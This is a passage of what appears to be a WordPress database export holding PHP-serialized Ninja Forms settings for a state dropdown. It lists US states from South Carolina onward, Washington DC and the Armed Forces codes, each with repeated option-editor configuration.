Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:40;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"South Carolina\";s:5:\"value\";s:2:\"SC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"40\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:41;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"South Dakota\";s:5:\"value\";s:2:\"SD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"41\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:42;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Tennessee\";s:5:\"value\";s:2:\"TN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"42\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:43;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Texas\";s:5:\"value\";s:2:\"TX\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"43\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:44;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Utah\";s:5:\"value\";s:2:\"UT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"44\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:45;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Vermont\";s:5:\"value\";s:2:\"VT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"45\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:46;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Virginia\";s:5:\"value\";s:2:\"VA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"46\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:47;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Washington\";s:5:\"value\";s:2:\"WA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"47\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:48;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"48\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"49\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"50\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:51;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Washington DC\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"51\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:52;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:51:\"ARMED FORCES AFRICA \\ CANADA \\ EUROPE \\ MIDDLE EAST\";s:5:\"value\";s:2:\"AE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"52\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:53;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:36:\"ARMED FORCES AMERICA (EXCEPT CANADA)\";s:5:\"value\";s:2:\"AA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"53\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:54;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"ARMED FORCES PACIFIC\";s:5:\"value\";s:2:\"AP\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"54\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:55:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"- Select State -\";s:5:\"value\";s:0:\"\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 